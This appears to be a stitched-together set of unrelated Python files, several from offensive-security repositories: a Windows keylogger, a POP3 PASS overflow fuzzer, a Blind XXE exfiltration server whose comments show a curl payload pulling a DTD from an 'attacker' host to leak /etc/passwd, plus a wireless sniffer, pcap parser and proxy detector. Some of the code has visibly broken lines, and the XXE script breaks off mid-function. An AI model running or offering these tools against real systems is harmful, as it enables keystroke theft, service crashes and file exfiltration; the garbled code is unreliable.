""" owtf.models.session ~~~~~~~~~~~~~~~~~~~ """ from sqlalchemy import Boolean, Column, Integer, String from sqlalchemy.orm import relationship from owtf.db.model_base import Model from owtf.lib import exceptions from import target_association_table class Session(Model): __tablename__ = "sessions" id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=True) active = Column(Boolean, default=False) targets = relationship("Target", secondary=target_association_table, backref="sessions") @classmethod def get_by_id(cls, session, id): session_obj = session.query(Session).get(id) if not session_obj: raise exceptions.InvalidSessionReference("No session with id: {!s}".format(id)) return session_obj.to_dict() @classmethod def get_active(cls, session): session_id = session.query( return session_id @classmethod def set_by_id(cls, session, session_id): query = session.query(Session) session_obj = query.get(session_id) if not session_obj: raise exceptions.InvalidSessionReference("No session with session_id: {!s}".format(session_id)) query.update({"active": False}) = True session.commit()
import os,sys from PIL import Image from PIL.ExifTags import TAGS for (i,j) in'image.jpg')._getexif().iteritems(): print '%s = %s' % (TAGS.get(i), j)
#!/usr/bin/python # -*- coding: utf-8 -*- import dpkt import socket def printPcap(pcap): for (ts, buf) in pcap: try: eth = dpkt.ethernet.Ethernet(buf) ip = src = socket.inet_ntoa(ip.src) dst = socket.inet_ntoa(ip.dst) print '[+] Src: ' + src + ' --> Dst: ' + dst except: pass def main(): f = open('geotest.pcap') pcap = dpkt.pcap.Reader(f) printPcap(pcap) if __name__ == '__main__': main()
from scapy.all import * interface = 'mon0' ap_list = [] def info(fm): if fm.haslayer(Dot11): if ((fm.type == 0) & (fm.subtype==8)): if fm.addr2 not in ap_list: ap_list.append(fm.addr2) print "SSID--> ",,"-- BSSID --> ",fm.addr2 sniff(iface=interface,prn=info)
""" ~~~~~~~~~~~~~~~~ # Inspired from: # """ import errno import os import platform import subprocess import sys import time if platform.system() == "Windows": from win32file import ReadFile, WriteFile from win32pipe import PeekNamedPipe import msvcrt else: import select import fcntl PIPE = subprocess.PIPE DISCONNECT_MESSAGE = "Other end disconnected!" class DisconnectException(Exception): def __init__(self, value): self.parameter = value def __str__(self): return repr(self.parameter) class AsyncPopen(subprocess.Popen): def recv(self, maxsize=None): return self._recv("stdout", maxsize) def recv_err(self, maxsize=None): return self._recv("stderr", maxsize) def send_recv(self, input="", maxsize=None): return self.send(input), self.recv(maxsize), self.recv_err(maxsize) def get_conn_maxsize(self, which, maxsize): if maxsize is None: maxsize = 1024 elif maxsize < 1: maxsize = 1 return getattr(self, which), maxsize def _close(self, which): getattr(self, which).close() setattr(self, which, None) if hasattr(subprocess, "mswindows"): def send(self, input): if not self.stdin: return None try: x = msvcrt.get_osfhandle(self.stdin.fileno()) (errCode, written) = WriteFile(x, input) except ValueError: return self._close("stdin") except (subprocess.pywintypes.error, Exception) as why: if why[0] in (109, errno.ESHUTDOWN): return self._close("stdin") raise return written def _recv(self, which, maxsize): conn, maxsize = self.get_conn_maxsize(which, maxsize) if conn is None: return None try: x = msvcrt.get_osfhandle(conn.fileno()) (read, navail, nMessage) = PeekNamedPipe(x, 0) if maxsize < navail: nAvail = maxsize if navail > 0: (errCode, read) = ReadFile(x, navail, None) except ValueError: return self._close(which) except (subprocess.pywintypes.error, Exception) as why: if why[0] in (109, errno.ESHUTDOWN): return self._close(which) raise if self.universal_newlines: read = self._translate_newlines(read) return read else: def send(self, input): if not self.stdin: return None if not[], [self.stdin], [], 0)[1]: return 0 try: written = os.write(self.stdin.fileno(), input) except OSError as why: if why[0] == errno.EPIPE: # broken pipe return self._close("stdin") raise return written def _recv(self, which, maxsize): conn, maxsize = self.get_conn_maxsize(which, maxsize) if conn is None: return None flags = fcntl.fcntl(conn, fcntl.F_GETFL) if not conn.closed: fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK) try: if not[conn], [], [], 0)[0]: return "" r = if not r: return self._close(which) if self.universal_newlines: r = self._translate_newlines(r) return r finally: if not conn.closed: fcntl.fcntl(conn, fcntl.F_SETFL, flags) def recv_some(p, t=.1, e=1, tr=5, stderr=0): if tr < 1: tr = 1 x = time.time() + t y = [] r = "" pr = p.recv if stderr: pr = p.recv_err while time.time() < x or r: r = pr() if r is None: if e: raise DisconnectException(DISCONNECT_MESSAGE) else: break elif r: y.append(r) else: time.sleep(max((x - time.time()) / tr, 0)) return "".join(y) def send_all(p, data): while len(data): sent = p.send(data) if sent is None: raise DisconnectException(DISCONNECT_MESSAGE) import sys if sys.version_info > (3,): buffer = memoryview data = buffer(data) if __name__ == "__main__": if sys.platform == "win32": shell, commands, tail = ("cmd", ("dir /w", "echo HELLO WORLD"), "\r\n") else: shell, commands, tail = ("sh", ("ls", "echo HELLO WORLD"), "\n") a = AsyncPopen(shell, stdin=PIPE, stdout=PIPE) print(recv_some(a)) for cmd in commands: send_all(a, cmd + tail) print(recv_some(a)) send_all(a, "exit" + tail) print(recv_some(a, e=0)) a.wait()
import click from lib import cheatsheet, question # @click.pass_context @click.help_option("-h", "--help") def cli(ctx): """ Should fill this in :P """ pass cli.add_command(cheatsheet) cli.add_command(question)
#!/usr/bin/env python try: import http.server as server except ImportError: import BaseHTTPServer as server import getopt import re import sys try: from urllib.parse import urlparse, urlencode from urllib.request import urlopen, Request from urllib.error import HTTPError, URLError from urllib.request import ( HTTPHandler, HTTPSHandler, HTTPRedirectHandler, ProxyHandler, build_opener, install_opener, ) except ImportError: from urlparse import urlparse from urllib import urlencode from urllib2 import ( urlopen, Request, HTTPError, HTTPHandler, HTTPSHandler, HTTPRedirectHandler, ProxyHandler, build_opener, install_opener, URLError, ) ################## HEADER ################################### # # Traceroute-like HTTP scanner # Using the "Max-Forwards" header # RFC 2616 - HTTP/1.1 - Section 14.31 # RFC 3261 - SIP - Section # # # By Nicolas Gregoire ( # # 0.5 : First public release # 0.4 : Private release, looking for bugs - More heuristics # 0.3 : A lot more options - More verbosity levels - Some heuristics # # By Julien Cayssol ( # # 0.2 : Add extract of headers # 0.1 : Initial version # # # Heuristics : # - Status Codes : # - HTTP Status Code == 502 # - HTTP Status Code == 483 # - Specific data in body or headers : # - X-Forwarded-For in body when using TRACE # - Via or X-Via in headers # - Differences between hops : # - HTTP Status Codes # - Server headers # - Content-Type headers # - Via headers # - HTML titles # - HTML <address> tags # - X-Forwarded-For values when using TRACE # ############## GLOBAL VARIABLES ################################### global_data = { "StatusCode": {}, "Server": {}, "Content-Type": {}, "Title": {}, "Address": {}, "X-Fwd": {}, "Via": {}, } score = 0 verbosity = 0 scheme = "http" host = "" port = "80" path = "/" method = "TRACE" body_content = None max_fwds = 3 userAgent = ( "Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20060502 Firefox/" ) contentType = "text/html" ############## FUNCTIONS ################################### # Pretty printing def zprint(string, flag="=="): print("[" + flag + "] " + string) # Increment the heuristic score def inc_score(): global score score = score + 1 if verbosity: zprint("Score : " + str(score), "!!") # Help def showUsage(): print( "Usage : " + sys.argv[0] + " [-h] [-m method] [-s scheme] [-t target] [-p port] [-P path] [-v 0|1|2] [-f forwards]" ) print("\t[-h] Help (this text)") print('\t[-m] HTTP Method : default is "TRACE"') print('\t[-s] Scheme : default is "http"') print('\t[-t] Target host : default is ""') print('\t[-p] Port : default is "80"') print('\t[-P] Path : default is "/"') print('\t[-f] Max # of forwards : default is "3"') print("\t[-v] Verbosity : 0 = default, 1 = verbose, 2 = debug") print("Examples :") print(sys.argv[0] + " -t") print(" => TRACE /") print(sys.argv[0] + " -t -m GET -s https -p 443 -v 1") print(" => GET / on a SSL host") print(sys.argv[0] + " -t -m POST -P /axis2/checkacc -v 2 -f 5") print(" => Debug mode on a specific end-point") sys.exit(1) # Parse CLI args def getArguments(): try: if len(sys.argv) < 2: zprint('No arguments ? Probably a bad choice. Use "-h" ...', "!!") sys.exit(1) optlist, list = getopt.getopt(sys.argv[1:], "hm:s:t:p:P:v:f:") except getopt.GetoptError: showUsage() for opt in optlist: if opt[0] == "-h": showUsage() if opt[0] == "-m": global method method = opt[1] if opt[0] == "-s": global scheme scheme = opt[1] if opt[0] == "-t": global host host = opt[1] if opt[0] == "-p": global port port = opt[1] if opt[0] == "-P": global path path = opt[1] if opt[0] == "-v": global verbosity verbosity = int(opt[1]) if opt[0] == "-f": global max_fwds max_fwds = int(opt[1]) # Extract some interesting data from the headers def analyse_headers(data): if verbosity: zprint("Analyzing headers", "**") wanted_headers = [ "Server", "Via", "X-Via", "Set-Cookie", "X-Forwarded-For", "Content-Type", "Content-Length", "Last-Modified", "Location", "Date", ] for h_name in wanted_headers: h_value = data.get(h_name) if h_value != None: # Print the value if verbosity: zprint(h_value, h_name) # Add it to the global structure if needed if h_name == "Server" or h_name == "Content-Type": global_data[h_name][hop] = h_value # Some heuristics if h_name == "Via" or h_name == "X-Via": zprint('"Via" header : Probably a reverse proxy', "++") global_data["Via"][hop] = h_value inc_score() # Extract some interesting data from the body def analyse_body(data): if verbosity: zprint("Analyzing body", "**") wanted_patterns = [ "<title>(.*)</title>", "<address>(.*)</address>", "Reason: <strong>(.*)</strong>", "X-Forwarded-For: (.*)", ] for p_name in wanted_patterns: # Case insensitive search p_value =, str(data), re.IGNORECASE) if p_value != None: # Only the 1st group, without newlines value = p_value.groups()[0].strip("\r\n") if verbosity: zprint(value, p_name) # Add it to the global structure if needed if p_name == "<title>(.*)</title>": global_data["Title"][hop] = value if p_name == "<address>(.*)</address>": global_data["Address"][hop] = value # Some heuristics if"X-Forwarded-For:", p_name): global_data["X-Fwd"][hop] = value if method == "TRACE": zprint( '"X-Forwarded-For" in body when using TRACE : Probably a reverse proxy', "++", ) inc_score() # Analyse the data returned by urllib2.*open() def debug_and_parse(data): # Get data headers = body = # Debug if verbosity == 2: zprint(str(headers), "DEBUG HEADERS") zprint(str(body), "DEBUG BODY") # Extract some interesting info codes = server.BaseHTTPRequestHandler.responses global_data["StatusCode"][hop] = str(data.code) + " " + codes[data.code][0] analyse_headers(headers) analyse_body(body) ############## SCAN ################################### # Init getArguments() # Current target url = scheme + "://" + host + ":" + port + path zprint("Target URL : " + url) zprint("Used method : " + method) zprint("Max number of hops : " + str(max_fwds)) # Scan for hop in range(0, max_fwds): # Create the request object request = Request(url) request.get_method = lambda: method = body_content request.add_header("Content-Type", contentType) request.add_header("User-agent", userAgent) # Add the 'Max-Forwards' header request.add_header("Max-Forwards", hop) if verbosity: print("-" * 80) zprint( 'Current value of "Max-Forwards" = ' + str(hop) + " [" + "-" * 20 + "]", "-" * 19, ) print("-" * 80) try: # Do the HTTP request opener = build_opener(HTTPHandler) result = # Found something if verbosity: zprint("Status Code => HTTP 200: OK", "**") # Analyse it debug_and_parse(result) # Not a 200 OK except HTTPError as e: if verbosity: zprint("Status Code => " + str(e), "**") # Some heuristics if e.code == 502: zprint("HTTP 502 : Probably a reverse proxy", "++") inc_score() if e.code == 483: zprint("HTTP 483 : Probably a reverse proxy (SIP ?)", "++") inc_score() # Analyse it debug_and_parse(e) # Network problem except URLError as e: zprint("Network problem !", "!!") zprint("Reason : " + str(e.reason), "!!") break ############## REPORT ################################### print("-" * 80) zprint("Heuristic Report [" + "-" * 31 + "]", "-" * 27) print("-" * 80) # For each key for k in list(global_data.keys()): string = k + ":\n" previous = "Undef" # For each hop ok = 0 for i in range(0, max_fwds): # Try this key try: current = global_data[k][i] # We got a value ! ok = 1 except KeyError: current = "Undef" # Some heuristics if previous != current and i > 0: inc_score() # Then add it to the current string string = string + "\tHop #" + str(i) + " : " + current + "\n" previous = current # Display this key only if values were found if ok: print(string) # Final score if score == 0: zprint("No reverse proxy", "--") else: zprint("Found a reverse proxy, score is " + str(score), "++")
# Python For Offensive PenTest # pyHook download link # # pythoncom download link # # Keylogger import pythoncom, pyHook #Again, once the user hit any keyboard button, keypressed func will be executed and that action will be store in event def keypressed(event): global store #Enter and backspace are not handled properly that's why we hardcode thier values to < Enter > and <BACK SPACE> # note that we can know if the user input was enter or backspace based on thier ASCII values if event.Ascii==13: keys=' < Enter > ' elif event.Ascii==8: keys=' <BACK SPACE> ' else: keys=chr(event.Ascii) store = store + keys #at the end we append the ascii keys into store variable and finally write them in keylogs text file fp=open("keylogs.txt","w") fp.write(store) fp.close() return True # after intercetping the keyboard we have to return a True value otherwise we will simply disable the keyboard functionality store = '' # string where we will store all the pressed keys #Next we create and register a hook manager and once the user hit any keyboard button, keypressed #func will be executed and that action will be store in event obj = pyHook.HookManager() obj.KeyDown = keypressed obj.HookKeyboard() #start the hooking loop and pump out the messages pythoncom.PumpMessages() #remember that per Pyhook documentation we must have a Windows message pump
# Primality Testing with the Rabin-Miller Algorithm # (BSD Licensed) import random def rabinMiller(num): # Returns True if num is a prime number. s = num - 1 t = 0 while s % 2 == 0: # keep halving s until it is even (and use t # to count how many times we halve s) s = s // 2 t += 1 for trials in range(5): # try to falsify num's primality 5 times a = random.randrange(2, num - 1) v = pow(a, s, num) if v != 1: # this test does not apply if v is 1. i = 0 while v != (num - 1): if i == t - 1: return False else: i = i + 1 v = (v ** 2) % num return True def isPrime(num): # Return True if num is a prime number. This function does a quicker # prime number check before calling rabinMiller(). if (num < 2): return False # 0, 1, and negative numbers are not prime # About 1/3 of the time we can quickly determine if num is not prime # by dividing by the first few dozen prime numbers. This is quicker # than rabinMiller(), but unlike rabinMiller() is not guaranteed to # prove that a number is prime. lowPrimes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997] if num in lowPrimes: return True # See if any of the low prime numbers can divide num for prime in lowPrimes: if (num % prime == 0): return False # If all else fails, call rabinMiller() to determine if num is a prime. return rabinMiller(num) def generateLargePrime(keysize=1024): # Return a random prime number of keysize bits in size. while True: num = random.randrange(2**(keysize-1), 2**(keysize)) if isPrime(num): return num
# -*- coding: utf-8 -*- from south.utils import datetime_utils as datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding field 'Project.auth_parameters' db.add_column(u'xtreme_server_project', 'auth_parameters','django.db.models.fields.TextField')(default='Not Set'), keep_default=False) # Adding field 'Project.auth_mode' db.add_column(u'xtreme_server_project', 'auth_mode','django.db.models.fields.TextField')(default='Not Set'), keep_default=False) def backwards(self, orm): # Deleting field 'Project.auth_parameters' db.delete_column(u'xtreme_server_project', 'auth_parameters') # Deleting field 'Project.auth_mode' db.delete_column(u'xtreme_server_project', 'auth_mode') models = { u'xtreme_server.form': { 'Meta': {'object_name': 'Form'}, 'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}), 'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}), 'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}) }, u'xtreme_server.inputfield': { 'Meta': {'object_name': 'InputField'}, 'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'}) }, u'xtreme_server.learntmodel': { 'Meta': {'object_name': 'LearntModel'}, 'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}), 'query_id': ('django.db.models.fields.TextField', [], {}) }, u'': { 'Meta': {'object_name': 'Page'}, 'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}), 'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}), 'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}) }, u'xtreme_server.project': { 'Meta': {'object_name': 'Project'}, 'allowed_extensions': ('django.db.models.fields.TextField', [], {}), 'allowed_protocols': ('django.db.models.fields.TextField', [], {}), 'auth_mode': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}), 'auth_parameters': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}), 'consider_only': ('django.db.models.fields.TextField', [], {}), 'exclude_fields': ('django.db.models.fields.TextField', [], {}), 'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'password': ('django.db.models.fields.TextField', [], {}), 'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}), 'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}), 'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}), 'username': ('django.db.models.fields.TextField', [], {}), 'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}) }, u'xtreme_server.settings': { 'Meta': {'object_name': 'Settings'}, 'allowed_extensions': ('django.db.models.fields.TextField', [], {}), 'allowed_protocols': ('django.db.models.fields.TextField', [], {}), 'auth_mode': ('django.db.models.fields.TextField', [], {}), 'consider_only': ('django.db.models.fields.TextField', [], {}), 'exclude_fields': ('django.db.models.fields.TextField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'password': ('django.db.models.fields.TextField', [], {}), 'username': ('django.db.models.fields.TextField', [], {}) }, u'xtreme_server.vulnerability': { 'Meta': {'object_name': 'Vulnerability'}, 'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'url': ('django.db.models.fields.TextField', [], {'blank': 'True'}) } } complete_apps = ['xtreme_server']
#!/usr/bin/python import socket buffer=["A"] counter=100 string="""Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds""" if 1: print"Fuzzing PASS with %s bytes" % len(string) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('',110)) data=s.recv(1024) #print str(data) s.send('USER root\r\n') data=s.recv(1024) print str(data) s.send('PASS ' + string + '\r\n') data=s.recv(1024) print str(data) print "done" #s.send('QUIT\r\n') #s.close()
#!/usr/bin/python # # Simple Blind XXE server intended to handle incoming requests for # malicious DTD file, that will subsequently ask for locally stored file, # like file:///etc/passwd. # # This program has been tested with PlayFramework 2.1.3 XXE vulnerability, # to be run as follows: # # 0. Configure global variables: SERVER_SOCKET and RHOST # # 1. Run the below script, using: # $ python [options] <filepath> # # where <filepath> can be for instance: "file:///etc/passwd" # # 2. Then, while server is running - invoke XXE by requesting e.g. # $ curl -X POST http://vulnerable/app --data-binary \ # $'<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://attacker/test.dtd"><foo>&exfil;</foo>' # # The expected result will be like the following: # # $ python # Exfiltrated file:///etc/passwd: # ------------------------------ # root:x:0:0:root:/root:/bin/sh # nobody:x:65534:65534:nobody:/nonexistent:/bin/false # user:x:1000:50:Linux User,,,:/home/user:/bin/sh # play:x:100:65534:Linux User,,,:/var/www/play/:/bin/false # mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false # # # Mariusz Banach, 2016 # from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer import urllib import re import sys import time import socket import argparse import threading # # CONFIGURE THE BELOW VARIABLES # config = { 'debug' : '', 'listen' : '', 'port' : 8080, 'rhost' : '', 'exfil-file' : '', } EXFILTRATED_EVENT = threading.Event() def dbg(x): if config['debug']: print('[dbg] {}'.format(x)) class BlindXXEServer(BaseHTTPRequestHandler): method = '' def response(self, **data): code = data.get('code', 200) content_type = data.get('content_type', 'text/plain') body = data.get('body', '') self.send_response(code) self.send_header('Content-Type', content_type) self.end_headers() self.wfile.write(body.encode('utf-8')) self.wfile.close() def do_GET(self): self.method = 'GET' self.request_handler(self) def do_POST(self): self.method = 'POST' self.request_handler(self) def log_message(self, format, *args): return def request_handler(self, request): global EXFILTRATED_EVENT print('[.] Incoming HTTP request from {}: {} {}'.format( self.client_address[0], request.method, request.path[:25] )) path = urllib.unquote(request.path).decode('utf8') m ='\/\?exfil=(.*)', path, re.MULTILINE) if m and request.command.lower() == 'get': data = path[len('/?exfil='):] print('\n[+] Exfiltrated %s:' % config['exfil-file']) print('-' * 30) 